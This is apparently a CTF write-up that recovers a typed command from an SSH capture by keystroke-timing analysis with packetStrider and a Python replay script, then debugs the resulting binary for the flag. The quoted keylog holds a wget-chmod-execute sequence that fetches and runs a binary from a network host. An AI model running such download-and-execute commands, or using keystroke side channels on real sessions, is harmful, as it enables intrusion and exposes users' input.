This challenge had zero solves during the competition. The next day, Hufu (虎符) CTF released a strengthened version that came with a hint pointing at SSH side channels; searching on that leads to a writeup from the 2020 SJTU (上交) campus CTF, which contains an almost identical challenge.
The first steps here are exactly the same as in that writeup: analyze the SSH pcap with the tool it mentions (packetStrider).
python3 packetStrider-ssh.py -f babytraffic.pcap -k -p -o out
This yields the keystroke analysis:
Detailed Events:
┃ packet time(s) delta(s) Direction Indicator Bytes Notes
┃ -----------------------------------------------------------------------
┃ 0 0 0 packet0 packet0 40
┃ 5 0.088 0.088 forward key offered 364
┃ 6 2.949 2.861 forward key accepted 16 Delta suggests hostkey was NOT in known_hosts, user manually accepted it
┃ 10 3.006 0.056 forward login prompt 52
┃ 11 3.048 0.042 forward login failure 372 Delta suggests Certificate Auth, pwd to cert null or non interactive
┃ 12 3.049 0.001 forward login prompt 52
┃ 13 7.25 4.201 forward login success 84 < 8 char Password, entered interactively by human
┃ 20 7.774 0.524 forward agent fwding 520 !! -A option used. Client private key sharing via SSH Agent Forwarding
┃ 23 9.708 1.933 forward keystroke 36
┃ 25 10.117 0.41 forward keystroke 36
┃ 27 10.936 0.819 forward keystroke 36
┃ 29 11.961 1.025 forward keystroke 36
┃ 31 12.781 0.82 forward keystroke 36
┃ 33 13.803 1.023 forward keystroke 36
┃ 35 14.521 0.717 forward keystroke 36
┃ 37 15.237 0.716 forward keystroke 36
┃ 39 16.057 0.821 forward keystroke 36
┃ 41 17.094 1.036 forward keystroke 36
┃ 43 18.104 1.011 forward keystroke 36
┃ 45 18.83 0.726 forward keystroke 36
┃ 47 19.846 1.016 forward keystroke 36
┃ 49 20.561 0.715 forward keystroke 36
┃ 51 21.381 0.82 forward keystroke 36
┃ 53 21.792 0.412 forward keystroke 36
┃ 55 22.813 1.021 forward keystroke 36
┃ 57 23.838 1.025 forward keystroke 36
┃ 59 24.862 1.024 forward keystroke 36
┃ 61 25.891 1.028 forward keystroke 36
┃ 63 26.91 1.019 forward keystroke 36
┃ 65 27.934 1.024 forward keystroke 36
┃ 67 29.571 1.637 forward keystroke 36
┃ 69 31.63 2.059 forward keystroke 36
┃ 71 32.336 0.707 forward keystroke 36
┃ 73 33.054 0.718 forward keystroke 36
┃ 75 33.872 0.817 forward keystroke 36
┃ 77 34.589 0.717 forward keystroke 36
┃ 79 35.612 1.023 forward keystroke 36
┃ 81 36.739 1.127 forward keystroke 36
┃ 83 37.456 0.717 forward keystroke 36
┃ 85 38.173 0.718 forward keystroke 36
┃ 87 38.89 0.717 forward keystroke 36
┃ 97 40.527 1.637 forward _┃ ENTER 1012
┃ 98 41.66 1.132 forward keystroke 36
┃ 100 42.37 0.711 forward keystroke 36
┃ 102 43.191 0.82 forward keystroke 36
┃ 104 43.907 0.716 forward keystroke 36
┃ 106 44.52 0.614 forward keystroke 36
┃ 108 45.238 0.718 forward keystroke 36
┃ 110 46.261 1.023 forward keystroke 36
┃ 112 47.388 1.127 forward keystroke 36
┃ 114 48.728 1.339 forward keystroke 36
┃ 116 49.845 1.117 forward keystroke 36
┃ 118 50.255 0.409 forward keystroke 36
┃ 120 50.977 0.722 forward keystroke 36
┃ 122 51.69 0.714 forward keystroke 36
┃ 126 52.507 0.817 forward _┃ ENTER 100
┃ 127 53.84 1.333 forward keystroke 36
┃ 129 55.477 1.637 forward keystroke 36
┃ 131 56.194 0.717 forward keystroke 36
┃ 133 56.604 0.41 forward keystroke 36
┃ 135 57.323 0.719 forward keystroke 36
┃ 137 57.936 0.613 forward keystroke 36
┃ 139 58.959 1.023 forward keystroke 36
┃ 141 60.292 1.333 forward keystroke 36
┃ 143 61.006 0.714 forward keystroke 36
┃ 145 61.725 0.719 forward keystroke 36
┃ 147 62.441 0.716 forward keystroke 36
┃ 149 67.457 5.016 forward < delete/ac 36
┃ 151 67.871 0.414 forward < delete/ac 36
┃ 153 70.12 2.249 forward keystroke 36
┃ 155 72.372 2.251 forward keystroke 36
┃ 157 75.648 3.277 forward < delete/ac 36
┃ 159 76.98 1.332 forward keystroke 36
┃ 161 79.027 2.047 forward keystroke 36
┃ 163 81.588 2.561 forward keystroke 36
┃ 165 83.636 2.048 forward keystroke 36
┃ 167 86.616 2.981 forward keystroke 36
┃ 169 92.251 5.635 forward < delete/ac 36
┃ 171 94.488 2.237 forward keystroke 36
┃ 173 95.512 1.024 forward keystroke 36
┃ 175 97.458 1.946 forward keystroke 36
┃ 177 98.789 1.331 forward keystroke 36
┃ 179 101.144 2.356 forward < delete/ac 36
┃ 181 103.706 2.562 forward keystroke 36
┃ 183 105.444 1.738 forward keystroke 36
┃ 185 107.697 2.253 forward keystroke 36
┃ 187 109.341 1.644 forward keystroke 36
┃ 189 111.691 2.35 forward keystroke 36
┃ 191 113.329 1.638 forward keystroke 36
┃ 193 115.687 2.359 forward < delete/ac 36
┃ 195 118.244 2.556 forward keystroke 36
┃ 197 119.885 1.641 forward keystroke 36
┃ 199 121.827 1.942 forward keystroke 36
┃ 201 123.261 1.433 forward keystroke 36
┃ 203 125.943 2.683 forward keystroke 36
┃ 205 127.971 2.027 forward keystroke 36
┃ 207 129.507 1.536 forward keystroke 36
┃ 209 130.941 1.434 forward keystroke 36
┃ 211 133.808 2.867 forward < delete/ac 36
┃ 213 134.831 1.023 forward < delete/ac 36
┃ 215 137.186 2.355 forward keystroke 36
┃ 217 139.132 1.945 forward keystroke 36
┃ 219 141.487 2.355 forward < delete/ac 36
┃ 221 143.433 1.946 forward keystroke 36
┃ 223 145.07 1.637 forward keystroke 36
┃ 225 146.402 1.332 forward keystroke 36
┃ 227 149.268 2.866 forward keystroke 36
┃ 229 150.292 1.024 forward keystroke 36
┃ 231 151.637 1.345 forward keystroke 36
┃ 233 154.184 2.547 forward < delete/ac 36
┃ 235 155.822 1.638 forward < delete/ac 36
┃ 237 157.869 2.048 forward keystroke 36
┃ 239 159.201 1.331 forward keystroke 36
┃ 241 161.453 2.253 forward keystroke 36
┃ 243 164.117 2.663 forward keystroke 36
┃ 245 165.139 1.022 forward keystroke 36
┃ 247 166.778 1.638 forward keystroke 36
┃ 249 167.808 1.03 forward < delete/ac 36
┃ 251 169.133 1.325 forward < delete/ac 36
┃ 253 172.307 3.175 forward keystroke 36
┃ 255 173.74 1.433 forward keystroke 36
┃ 259 175.584 1.844 forward _┃ ENTER 100
In this table, keystroke is a normal key press, _┃ ENTER is the Enter key, and < delete/ac is packetStrider's label for a backspace or a tab completion (hence "delete/ac"; it is inferred from the server's echo, not from the plaintext). In this capture every < delete/ac is a backspace that removes the previous character: the third line has exactly 52 keystroke events and keylog.txt logs exactly 52 characters for it, which would not line up if any of those events had been a completion.
Combine this with the keylog.txt provided in the challenge attachment:
wget http://192.168.1.5:9999/bash
chmod +x bash
./bash dsz al1SkZnNE7903oI2fjFuPAqteT5e5bxchCtMhmmLm
Comparing against the keystroke events, the first two lines of keylog.txt were typed straight through with no corrections (33 and 13 keystroke events followed by Enter, exactly the length of each line); deletions only appear on the third line. Replaying the third line character by character, consuming one logged character per keystroke event and dropping the last buffered character per delete event, restores the command that was actually executed:
./bash dsa1SkZNE703oI2jFuPAqTe5bxCtMhLm
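The replay described above, written out as a small script so the reconstruction can be checked mechanically instead of by eye. This is an added example for this writeup, not the challenge author's or packetStrider's code: the function names are my own, the three keylog.txt lines are embedded as constructed input, and the event sequence is a hand transcription of the packetStrider table above in run-length form (the parser is demonstrated on a short excerpt of real rows and can be pointed at the full saved output instead).

```python
"""Replay packetStrider keystroke/delete events against keylog.txt to
rebuild the command lines that were actually executed.
Added example for this writeup; not the challenge author's or packetStrider's code."""
import re

# Indicator strings as packetStrider prints them in its "Detailed Events" table.
KEYSTROKE = "keystroke"
DELETE = "< delete/ac"
ENTER = "ENTER"


def parse_strider_events(text):
    """Map packetStrider event rows to tokens: 'k' (printable key),
    'd' (backspace) or '\\n' (Enter). Session setup rows (key exchange,
    login, agent forwarding) carry none of these indicators and are skipped."""
    tokens = []
    for line in text.splitlines():
        if "forward" not in line:
            continue
        rest = line.split("forward", 1)[1]
        if KEYSTROKE in rest:
            tokens.append("k")
        elif DELETE in rest:
            tokens.append("d")
        elif ENTER in rest:
            tokens.append("\n")
    return tokens


def split_lines(tokens):
    """Group tokens into one list per command line, splitting at Enter."""
    lines, cur = [], []
    for tok in tokens:
        if tok == "\n":
            lines.append(cur)
            cur = []
        else:
            cur.append(tok)
    if cur:
        lines.append(cur)
    return lines


def expand(rle):
    """'11k 2d' -> ['k']*11 + ['d']*2 (compact hand transcription of the table)."""
    out = []
    for count, kind in re.findall(r"(\d+)([kd])", rle):
        out.extend(kind * int(count))
    return out


# Constructed inputs: the three lines of keylog.txt, and the event sequence
# transcribed from the packetStrider table above, one entry per command line.
KEYLOG = """\
wget http://192.168.1.5:9999/bash
chmod +x bash
./bash dsz al1SkZnNE7903oI2fjFuPAqteT5e5bxchCtMhmmLm"""

SESSION_EVENTS = [
    expand("33k"),
    expand("13k"),
    expand("11k 2d 2k 1d 5k 1d 4k 1d 6k 1d 8k 2d 2k 1d 6k 2d 6k 2d 2k"),
]

# A few real rows from the table, to exercise the parser on packetStrider's format.
STRIDER_EXCERPT = """\
┃ 247 166.778 1.638 forward keystroke 36
┃ 249 167.808 1.03 forward < delete/ac 36
┃ 251 169.133 1.325 forward < delete/ac 36
┃ 253 172.307 3.175 forward keystroke 36
┃ 255 173.74 1.433 forward keystroke 36
┃ 259 175.584 1.844 forward _┃ ENTER 100
"""


def replay_line(logged_chars, events):
    """Feed the logged characters into a line buffer in event order: each
    'k' consumes the next logged character, each 'd' drops the last buffered
    one. A count mismatch means the pcap and the keylog do not describe the
    same line (for instance a 'delete/ac' that was really a tab completion)."""
    buf, it = [], iter(logged_chars)
    for ev in events:
        if ev == "k":
            try:
                buf.append(next(it))
            except StopIteration:
                raise ValueError("more keystroke events than logged characters") from None
        elif ev == "d" and buf:
            buf.pop()
    leftover = sum(1 for _ in it)
    if leftover:
        raise ValueError(f"{leftover} logged characters without a keystroke event")
    return "".join(buf)


def reconstruct_session(keylog=KEYLOG, session_events=SESSION_EVENTS):
    """Replay every keylog line against its event list; returns the commands run."""
    lines = keylog.splitlines()
    if len(lines) != len(session_events):
        raise ValueError("keylog line count differs from number of Enter events")
    return [replay_line(line, ev) for line, ev in zip(lines, session_events)]


if __name__ == "__main__":
    for cmd in reconstruct_session():
        print(cmd)
```

The count checks in replay_line are the part worth keeping for other captures: if packetStrider misclassifies a packet, or the keylog and pcap come from different sessions, the replay fails loudly instead of silently producing a plausible-looking but wrong argument.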
Running this command as-is does not produce the flag, though; the binary has to be debugged dynamically, with either IDA or gdb.
Start by loading the bash binary in IDA. In main there are operations on the parameter a2, which is our argv.
About main's arguments: int main(int argc, char** argv).
For this challenge, ./bash dsa1SkZNE703oI2jFuPAqTe5bxCtMhLm
gives argv[0] = "./bash" (the program name as invoked) and argv[1] = "dsa1SkZNE703oI2jFuPAqTe5bxCtMhLm"; IDA's decompiler names argv a2, so a2[1] is our argument string.
main calls two functions. The first takes a2[1] among its parameters, but stepping into it shows that it never actually does anything with a2[1]. The second function does: at its end there is a series of operations on a2,
and it finally returns result. Under the x86-64 SysV calling convention the second argument is passed in rsi, so set a breakpoint on that final return result,
run the program under the debugger, and inspect rsi.
rsi now holds a strange string: xY4lqpkaNTui1s98
This is the flag.
gdb works too, but the argument has to be set first:
set args dsa1SkZNE703oI2jFuPAqTe5bxCtMhLm
and the breakpoint address has to be worked out as the program's load base plus the offset shown in IDA before the breakpoint is placed at that return. Once it hits, rsi shows the same string:
xY4lqpkaNTui1s98